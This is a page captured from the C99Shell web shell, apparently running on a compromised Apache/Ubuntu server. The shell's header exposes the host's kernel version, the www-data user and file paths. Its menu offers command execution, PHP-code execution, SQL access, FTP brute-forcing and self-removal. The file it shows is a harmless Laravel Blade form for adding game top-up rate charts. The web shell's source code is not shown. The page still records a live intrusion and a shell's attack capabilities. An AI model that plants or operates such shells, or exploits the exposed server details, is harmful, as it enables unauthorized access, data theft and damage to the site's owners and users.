!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/cloud_campaign/resources/views/rateChart/   drwxr-xr-x
Free 13.18 GB of 57.97 GB (22.75%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     addRateChart.blade.php (5.18 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.app', ['title' => __('Add User')])

@section('content')
    @include('users.partials.header', [
    ])   

    <div class="container-fluid mt--7">
        <div class="row">
            <div class="col-xl-12 order-xl-1">
                <div class="card bg-secondary shadow">
                    <div class="card-header bg-white border-0">
                        <div class="row align-items-center">
                            <h3 class="mb-0">{{ __('Add Rate Chart') }}</h3>
                        </div>
                    </div>
                    <div class="card-body">
                        <form method="post" action="{{ route('user.add') }}" autocomplete="off">
                            @csrf
                            @method('post')

                            
                            @if (session('status'))
                                <div class="alert alert-success alert-dismissible fade show" role="alert">
                                    {{ session('status') }}
                                    <button type="button" class="close" data-dismiss="alert" aria-label="Close">
                                        <span aria-hidden="true">&times;</span>
                                    </button>
                                </div>
                            @endif


                            <div class="pl-lg-4">
                                <div class="form-row">
                                     <div class="form-group{{ $errors->has('name') ? ' has-danger' : '' }} col-md-6 ">
                                        <label class="form-control-label" for="input-name">{{ __('Game Name') }}</label>

                                            <select class="form-control"   name="name" id="name">
                                                <option selected>Select Game</option>
                                                <option value="Pubg">Pubg</option>
                                                <option value="Free Fire">Free Fire</option>
                                                <option value="COC">COC</option>
                                                <option value="COD Mobile">COD Mobile</option>
                                                <option value="Valorant">Valorant</option>
                                                <option value="WarZone">WarZone</option>
                                            </select>
                                         
                                             <!-- </div> -->
                                            
                                        <!-- </div>  -->
                                        @if ($errors->has('name'))
                                            <span class="invalid-feedback" role="alert">
                                                <strong>{{ $errors->first('name') }}</strong>
                                            </span>
                                        @endif
                                    </div>
                                    <div class="form-group{{ $errors->has('amount') ? ' has-danger' : '' }} col-md-6">
                                        <label class="form-control-label" for="input-amount">{{ __('Amount') }}</label>
                                        <input type="text" name="amount" id="input-amount" class="form-control form-control-alternative{{ $errors->has('amount') ? ' is-invalid' : '' }}" placeholder="{{ __('Amount') }}"  required autofocus>

                                        @if ($errors->has('amount'))
                                            <span class="invalid-feedback" role="alert">
                                                <strong>{{ $errors->first('amount') }}</strong>
                                            </span>
                                        @endif
                                    </div>
                                    <div class="form-group{{ $errors->has('Taka') ? ' has-danger' : '' }} col-md-6" >
                                        <label class="form-control-label" for="input-taka">{{ __('Taka') }}</label>
                                        <input type="text" name="taka" id="input-taka" class="form-control form-control-alternative{{ $errors->has('taka') ? ' is-invalid' : '' }}" placeholder="{{ __('Taka') }}"  required>

                                        @if ($errors->has('taka'))
                                            <span class="invalid-feedback" role="alert">
                                                <strong>{{ $errors->first('taka') }}</strong>
                                            </span>
                                        @endif
                                    </div>
                                    <div style="margin-left:120px;margin-top:5px; ">
                                        <button type="submit" class="btn btn-success mt-4" style="font-size: 18px;">{{ __('Save') }}</button>
                                    </div>
                                </div>

                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
        
        @include('layouts.footers.auth')
    </div>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0058 ]--